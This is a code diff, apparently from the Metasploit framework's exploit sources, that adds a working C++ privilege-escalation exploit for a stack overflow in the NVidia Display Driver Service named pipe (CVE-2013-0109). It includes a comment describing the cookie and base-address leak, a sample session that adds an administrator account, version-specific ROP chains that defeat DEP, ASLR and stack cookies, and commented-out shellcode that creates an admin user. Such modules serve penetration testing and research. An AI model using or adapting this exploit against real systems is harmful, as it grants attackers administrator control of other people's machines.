case DLL_PROCESS_ATTACH:
|
||||||
|
hAppInstance = hinstDLL;
|
||||||
|
elevate_nvidia_nvsvc(lpReserved);
|
||||||
|
break;
|
||||||
|
case DLL_PROCESS_DETACH:
|
||||||
|
case DLL_THREAD_ATTACH:
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
return bReturnValue;
|
||||||
|
}
|
|
@ -0,0 +1,546 @@
|
||||||
|
/*
|
||||||
|
NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012
|
||||||
|
- Bypass DEP + ASLR + /GS + CoE
|
||||||
|
=============================================================
|
||||||
|
(@peterwintrsmith)
|
||||||
|
|
||||||
|
** Initial release 25/12/12
|
||||||
|
** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks
|
||||||
|
@seanderegge!
|
||||||
|
|
||||||
|
Hey all!
|
||||||
|
|
||||||
|
Here is an interesting exploit for a stack buffer overflow in the NVidia
|
||||||
|
Display Driver Service. The service listens on a named pipe (\pipe\nsvr)
|
||||||
|
which has a NULL DACL configured, which should mean that any logged on user
|
||||||
|
or remote user in a domain context (Windows firewall/file sharing
|
||||||
|
permitting) should be able to exploit this vulnerability.
|
||||||
|
|
||||||
|
The buffer overflow occurs as a result of a bad memmove operation, with the
|
||||||
|
stack layout effectively looking like this:
|
||||||
|
|
||||||
|
[locals]
|
||||||
|
[received-data]
|
||||||
|
[response-buf]
|
||||||
|
[stack cookie]
|
||||||
|
[return address]
|
||||||
|
[arg space]
|
||||||
|
[etc]
|
||||||
|
|
||||||
|
The memmove copies data from the received-data buffer into the response-buf
|
||||||
|
buffer, unchecked. It is possible to control the offset from which the copy
|
||||||
|
starts in the received-data buffer by embedding a variable length string -
|
||||||
|
which forms part of the protocol message being crafted - as well as the
|
||||||
|
number of bytes copied into the response buffer.
|
||||||
|
|
||||||
|
The amount of data sent back over the named pipe is related to the number
|
||||||
|
of bytes copied rather than the maximum number of bytes that the buffer is
|
||||||
|
able to safely contain, so it is possible to leak stack data by copying
|
||||||
|
from the end of the received-data buffer, through the response-buf buffer
|
||||||
|
(which is zeroed first time round, and second time round contains whatever
|
||||||
|
was in it beforehand), right to the end of the stack frame (including stack
|
||||||
|
cookie and return address).
|
||||||
|
|
||||||
|
As the entire block of data copied is sent back, the stack cookie and
|
||||||
|
nvvsvc.exe base can be determined using the aforementioned process. The
|
||||||
|
stack is then trashed, but the function servicing pipe messages won't
|
||||||
|
return until the final message has been received, so it doesn't matter too
|
||||||
|
much.
|
||||||
|
|
||||||
|
It is then possible to exploit the bug by sending two further packets of
|
||||||
|
data: One containing the leaked stack cookie and a ROP chain dynamically
|
||||||
|
generated using offsets from the leaked nvvsvc.exe base (which simply fills
|
||||||
|
the response-buf buffer when this data is echoed back) and a second packet
|
||||||
|
which contains enough data to trigger an overwrite if data is copied from
|
||||||
|
the start of the received-data buffer into the response-buf (including the
|
||||||
|
data we primed the latter to contain - stack cookie and ROP chain).
|
||||||
|
|
||||||
|
Allowing the function to then return leads to execution of our ROP chain,
|
||||||
|
and our strategically placed Metasploit net user /add shellcode! We get
|
||||||
|
continuation of execution for free because the process spins up a thread
|
||||||
|
to handle each new connection, and there are no deadlocks etc.
|
||||||
|
|
||||||
|
I've included two ROP chains, one which works against the nvvsvc.exe
|
||||||
|
running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers
|
||||||
|
from the Dell site, and one which works against the latest version of the
|
||||||
|
drivers for the same card, from:
|
||||||
|
http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
|
||||||
|
http://www.geforce.co.uk/drivers/results/54709
|
||||||
|
|
||||||
|
Hope you find this interesting - it's a fun bug to play with!
|
||||||
|
|
||||||
|
- Sample Session -
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
|
||||||
|
Alias name administrators
|
||||||
|
Comment Administrators have complete and unrestricted access to the computer/domain
|
||||||
|
|
||||||
|
Members
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------------
|
||||||
|
Administrator
|
||||||
|
Peter
|
||||||
|
The command completed successfully.
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
|
||||||
|
** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
|
||||||
|
[@peterwintrsmith]
|
||||||
|
- Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
|
||||||
|
|
||||||
|
Action 1 of 9: - CONNECT
|
||||||
|
|
||||||
|
Action 2 of 9: - CLIENT => SERVER
|
||||||
|
Written 16416 (0x4020) characters to pipe
|
||||||
|
|
||||||
|
Action 3 of 9: - SERVER => CLIENT
|
||||||
|
Read 16504 (0x4078) characters from pipe
|
||||||
|
|
||||||
|
Action 4 of 9: Building exploit ...
|
||||||
|
=> Stack cookie 0xe2e2893340d4:
|
||||||
|
=> nvvsvc.exe base 0x13fb90000:
|
||||||
|
|
||||||
|
Action 5 of 9: - CLIENT => SERVER
|
||||||
|
Written 16416 (0x4020) characters to pipe
|
||||||
|
|
||||||
|
Action 6 of 9: - SERVER => CLIENT
|
||||||
|
Read 16384 (0x4000) characters from pipe
|
||||||
|
|
||||||
|
Action 7 of 9: - CLIENT => SERVER
|
||||||
|
Written 16416 (0x4020) characters to pipe
|
||||||
|
|
||||||
|
Action 8 of 9: - SERVER => CLIENT
|
||||||
|
Read 16896 (0x4200) characters from pipe
|
||||||
|
|
||||||
|
Action 9 of 9: - DISCONNECT
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
|
||||||
|
Alias name administrators
|
||||||
|
Comment Administrators have complete and unrestricted access to the computer/domain
|
||||||
|
|
||||||
|
Members
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------------
|
||||||
|
Administrator
|
||||||
|
Peter
|
||||||
|
r00t
|
||||||
|
The command completed successfully.
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
extern "C" {
|
||||||
|
#include "nvidia_nvsvc.h"
|
||||||
|
}
|
||||||
|
|
||||||
|
enum EProtocolAction
|
||||||
|
{
|
||||||
|
ProtocolAction_Connect = 0,
|
||||||
|
ProtocolAction_Receive,
|
||||||
|
ProtocolAction_Send,
|
||||||
|
ProtocolAction_Disconnect,
|
||||||
|
ProtocolAction_ReadCookie,
|
||||||
|
};
|
||||||
|
|
||||||
|
typedef struct
|
||||||
|
{
|
||||||
|
EProtocolAction Action;
|
||||||
|
PBYTE Buf;
|
||||||
|
DWORD Length;
|
||||||
|
} ProtocolMessage;
|
||||||
|
|
||||||
|
const int GENERIC_BUF_LENGTH = 0x10000;
|
||||||
|
|
||||||
|
#define WriteByte(val) {buf[offs] = val; offs += 1;}
|
||||||
|
#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;}
|
||||||
|
#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;}
|
||||||
|
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
|
||||||
|
#define BufRemaining() (sizeof(buf) - offs)
|
||||||
|
|
||||||
|
DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
|
||||||
|
{
|
||||||
|
DWORD dwWritten = 0;
|
||||||
|
|
||||||
|
if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
|
||||||
|
{
|
||||||
|
return dwWritten;
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
|
||||||
|
{
|
||||||
|
DWORD dwRead = 0, dwAvailable = 0;
|
||||||
|
|
||||||
|
if (bTimeout)
|
||||||
|
{
|
||||||
|
for (DWORD i = 0; i < 30; i++)
|
||||||
|
{
|
||||||
|
if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
|
||||||
|
{
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (dwAvailable)
|
||||||
|
{
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
Sleep(100);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!dwAvailable)
|
||||||
|
{
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
|
||||||
|
{
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
Cleanup:
|
||||||
|
return dwRead;
|
||||||
|
}
|
||||||
|
|
||||||
|
HANDLE EstablishPipeConnection(char *pszPipe)
|
||||||
|
{
|
||||||
|
HANDLE hPipe = CreateFileA(
|
||||||
|
pszPipe,
|
||||||
|
GENERIC_READ | GENERIC_WRITE,
|
||||||
|
0,
|
||||||
|
NULL,
|
||||||
|
OPEN_EXISTING,
|
||||||
|
0,
|
||||||
|
NULL
|
||||||
|
);
|
||||||
|
|
||||||
|
if (hPipe == INVALID_HANDLE_VALUE)
|
||||||
|
{
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
return hPipe;
|
||||||
|
}
|
||||||
|
|
||||||
|
BYTE *BuildMalicious_LeakStack()
|
||||||
|
{
|
||||||
|
static BYTE buf[0x4020] = {0};
|
||||||
|
UINT offs = 0;
|
||||||
|
|
||||||
|
WriteWord(0x52);
|
||||||
|
|
||||||
|
for(UINT i=0; i<0x2000; i++)
|
||||||
|
WriteWord(0x41);
|
||||||
|
|
||||||
|
WriteWord(0);
|
||||||
|
|
||||||
|
WriteDword(0);
|
||||||
|
WriteDword(0x4078);
|
||||||
|
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
|
||||||
|
return buf;
|
||||||
|
}
|
||||||
|
|
||||||
|
BYTE *BuildMalicious_FillBuf()
|
||||||
|
{
|
||||||
|
static BYTE buf[0x4020] = {0};
|
||||||
|
UINT offs = 0;
|
||||||
|
|
||||||
|
WriteWord(0x52);
|
||||||
|
WriteWord(0); // string
|
||||||
|
|
||||||
|
WriteDword(0);
|
||||||
|
WriteDword(0x4000);
|
||||||
|
|
||||||
|
while(BufRemaining())
|
||||||
|
WriteDword(0x43434343);
|
||||||
|
|
||||||
|
return buf;
|
||||||
|
}
|
||||||
|
|
||||||
|
BYTE *BuildMalicious_OverwriteStack()
|
||||||
|
{
|
||||||
|
static BYTE buf[0x4020] = { 0 };
|
||||||
|
UINT offs = 0;
|
||||||
|
|
||||||
|
WriteWord(0x52);
|
||||||
|
WriteWord(0); // string
|
||||||
|
|
||||||
|
WriteDword(0);
|
||||||
|
WriteDword(0x4340); // enough to copy shellcode too
|
||||||
|
|
||||||
|
while (BufRemaining())
|
||||||
|
{
|
||||||
|
WriteDword(0x42424242);
|
||||||
|
}
|
||||||
|
|
||||||
|
return buf;
|
||||||
|
}
|
||||||
|
|
||||||
|
/*!
|
||||||
|
* @brief Entry point for the exploit code.
|
||||||
|
* @param payload Pointer to the payload memory, which must be NULL terminated.
|
||||||
|
*/
|
||||||
|
VOID elevate_nvidia_nvsvc(LPVOID payload)
|
||||||
|
{
|
||||||
|
SIZE_T payloadLen = strlen((char*)payload) + 1;
|
||||||
|
DWORD dwReturnCode = 1, dwBytesInOut = 0;
|
||||||
|
HANDLE hPipe = NULL;
|
||||||
|
|
||||||
|
static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 };
|
||||||
|
|
||||||
|
memset(rgReadBuf, 0, sizeof(rgReadBuf));
|
||||||
|
|
||||||
|
ProtocolMessage rgConvoMsg[] =
|
||||||
|
{
|
||||||
|
{ ProtocolAction_Connect, NULL, 0 },
|
||||||
|
{ ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 },
|
||||||
|
{ ProtocolAction_Receive, { 0 }, 0x4200 },
|
||||||
|
{ ProtocolAction_ReadCookie, { 0 }, 0 },
|
||||||
|
{ ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 },
|
||||||
|
{ ProtocolAction_Receive, { 0 }, 0x4000 },
|
||||||
|
{ ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 },
|
||||||
|
{ ProtocolAction_Receive, { 0 }, 0x4200 },
|
||||||
|
{ ProtocolAction_Disconnect, NULL, 0 },
|
||||||
|
};
|
||||||
|
|
||||||
|
DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
|
||||||
|
BOOL bTryAgain = FALSE;
|
||||||
|
char szPipe[256] = "\\\\.\\pipe\\nvsr";
|
||||||
|
|
||||||
|
// We could renable remote hosts to target other devices on network?!
|
||||||
|
// sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);
|
||||||
|
|
||||||
|
while (i < dwNumberOfMessages)
|
||||||
|
{
|
||||||
|
printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);
|
||||||
|
|
||||||
|
switch (rgConvoMsg[i].Action)
|
||||||
|
{
|
||||||
|
case ProtocolAction_Connect:
|
||||||
|
printf(" - CONNECT\n");
|
||||||
|
|
||||||
|
hPipe = EstablishPipeConnection(szPipe);
|
||||||
|
if (!hPipe)
|
||||||
|
{
|
||||||
|
printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_Disconnect:
|
||||||
|
printf(" - DISCONNECT\n");
|
||||||
|
|
||||||
|
CloseHandle(hPipe);
|
||||||
|
hPipe = NULL;
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_Send:
|
||||||
|
printf(" - CLIENT => SERVER\n");
|
||||||
|
|
||||||
|
if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
|
||||||
|
{
|
||||||
|
printf("!! Error writing to pipe\n");
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_Receive:
|
||||||
|
printf("\t - SERVER => CLIENT\n");
|
||||||
|
|
||||||
|
if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
|
||||||
|
{
|
||||||
|
printf("!! Error reading from pipe (at least, no data on pipe)\n");
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_ReadCookie:
|
||||||
|
|
||||||
|
// x64 Metasploit cmd/exec:
|
||||||
|
// "net user r00t r00t00r! /add & net localgroup administrators /add"
|
||||||
|
// exitfunc=thread
|
||||||
|
/*char code[] = ""
|
||||||
|
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||||
|
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||||
|
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||||
|
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||||
|
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||||
|
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||||
|
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||||
|
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||||
|
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||||
|
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||||
|
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
||||||
|
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||||
|
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||||
|
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||||
|
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||||
|
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||||
|
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
|
||||||
|
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
|
||||||
|
"\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
|
||||||
|
"\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
|
||||||
|
"\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
|
||||||
|
"\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/
|
||||||
|
printf("Building exploit ...\n");
|
||||||
|
unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
|
||||||
|
printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);
|
||||||
|
|
||||||
|
memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);
|
||||||
|
|
||||||
|
unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;
|
||||||
|
|
||||||
|
// Perform some limited fingerprinting (my default install version, vs latest at time of testing)
|
||||||
|
switch (uiRetnAddress & 0xfff)
|
||||||
|
{
|
||||||
|
case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
|
||||||
|
uiBase = uiRetnAddress - 0x4640;
|
||||||
|
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
|
||||||
|
|
||||||
|
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
|
||||||
|
|
||||||
|
// Param 1: lpAddress [r11 (near rsp) into rcx]
|
||||||
|
pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
|
||||||
|
pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
|
||||||
|
pRopChain[2] = 0; // Padding
|
||||||
|
pRopChain[3] = 0; // ...
|
||||||
|
pRopChain[4] = 0; // ...
|
||||||
|
pRopChain[5] = 0; // ...
|
||||||
|
pRopChain[6] = 0; // ...
|
||||||
|
pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
|
||||||
|
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
|
||||||
|
pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
|
||||||
|
pRopChain[10] = 0; // Padding
|
||||||
|
pRopChain[11] = 0; // ...
|
||||||
|
pRopChain[12] = 0; // ...
|
||||||
|
pRopChain[13] = 0; // ...
|
||||||
|
pRopChain[14] = 0; // ...
|
||||||
|
pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn
|
||||||
|
pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
|
||||||
|
pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
|
||||||
|
// Param 4: lpflOldProtect [r9 - already points at writable location]
|
||||||
|
pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
|
||||||
|
pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
|
||||||
|
pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
|
||||||
|
pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)
|
||||||
|
|
||||||
|
memcpy(pRopChain + 22, payload, payloadLen);
|
||||||
|
break;
|
||||||
|
case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
|
||||||
|
uiBase = uiRetnAddress - 0x39f1;
|
||||||
|
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
|
||||||
|
|
||||||
|
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
|
||||||
|
|
||||||
|
// Param 1: lpAddress [r11 (near rsp) into rcx]
|
||||||
|
pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
|
||||||
|
pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
|
||||||
|
pRopChain[2] = 0; // Padding ...
|
||||||
|
pRopChain[3] = 0; // ...
|
||||||
|
pRopChain[4] = 0; // ...
|
||||||
|
pRopChain[5] = 0; // ...
|
||||||
|
pRopChain[6] = 0; // ...
|
||||||
|
pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
|
||||||
|
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
|
||||||
|
pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
|
||||||
|
pRopChain[10] = 0; // Padding ...
|
||||||
|
pRopChain[11] = 0; // ...
|
||||||
|
pRopChain[12] = 0; // ...
|
||||||
|
pRopChain[13] = 0; // ...
|
||||||
|
pRopChain[14] = 0; // ...
|
||||||
|
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
|
||||||
|
pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
|
||||||
|
pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE
|
||||||
|
pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
|
||||||
|
pRopChain[18] = 0; // Padding ...
|
||||||
|
pRopChain[19] = 0; // ...
|
||||||
|
pRopChain[20] = 0; // ...
|
||||||
|
pRopChain[21] = 0; // ...
|
||||||
|
pRopChain[22] = 0; // ...
|
||||||
|
// Param 4: lpflOldProtect [r9 - already points at writable location]
|
||||||
|
pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
|
||||||
|
pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
|
||||||
|
pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
|
||||||
|
pRopChain[26] = 0; // Padding ...
|
||||||
|
pRopChain[27] = 0; // ...
|
||||||
|
pRopChain[28] = 0; // ...
|
||||||
|
pRopChain[29] = 0; // ...
|
||||||
|
pRopChain[30] = 0; // ...
|
||||||
|
pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
|
||||||
|
pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp
|
||||||
|
|
||||||
|
memcpy(pRopChain + 33, payload, payloadLen);
|
||||||
|
break;
|
||||||
|
case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
|
||||||
|
uiBase = uiRetnAddress - 0x3a11;
|
||||||
|
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
|
||||||
|
|
||||||
|
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
|
||||||
|
|
||||||
|
// Param 1: lpAddress [r11 (near rsp) into rcx]
|
||||||
|
pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn
|
||||||
|
pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
|
||||||
|
pRopChain[2] = 0; // Padding ...
|
||||||
|
pRopChain[3] = 0; // ...
|
||||||
|
pRopChain[4] = 0; // ...
|
||||||
|
pRopChain[5] = 0; // ...
|
||||||
|
pRopChain[6] = 0; // ...
|
||||||
|
pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
|
||||||
|
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
|
||||||
|
pRopChain[9] = 0; // Padding ...
|
||||||
|
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
|
||||||
|
pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
|
||||||
|
pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE
|
||||||
|
pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
|
||||||
|
pRopChain[13] = 0; // Padding ...
|
||||||
|
pRopChain[14] = 0; // ...
|
||||||
|
pRopChain[15] = 0; // ...
|
||||||
|
pRopChain[16] = 0; // ...
|
||||||
|
pRopChain[17] = 0; // ...
|
||||||
|
// Param 4: lpflOldProtect [r9 - already points at writable location]
|
||||||
|
pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
|
||||||
|
pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128
|
||||||
|
pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
|
||||||
|
pRopChain[21] = 0; // Padding ...
|
||||||
|
pRopChain[22] = 0; // ...
|
||||||
|
pRopChain[23] = 0; // ...
|
||||||
|
pRopChain[24] = 0; // ...
|
||||||
|
pRopChain[25] = 0; // ...
|
||||||
|
pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax
|
||||||
|
pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn
|
||||||
|
|
||||||
|
memcpy(pRopChain + 28, payload, payloadLen);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
|
||||||
|
Cleanup:
|
||||||
|
if (hPipe)
|
||||||
|
{
|
||||||
|
CloseHandle(hPipe);
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,6 @@
|
||||||
|
#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
|
||||||
|
#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
|
||||||
|
|
||||||
|
VOID elevate_nvidia_nvsvc(LPVOID payload);
|
||||||
|
|
||||||
|
#endif
|
142
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj
vendored
Executable file
142
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj
vendored
Executable file
|
@ -0,0 +1,142 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectGuid>{6B3FF768-1F25-49C1-8827-EDEC84D4749F}</ProjectGuid>
|
||||||
|
<RootNamespace>nvidia_nvsvc</RootNamespace>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
|
</PropertyGroup>
|
||||||
|
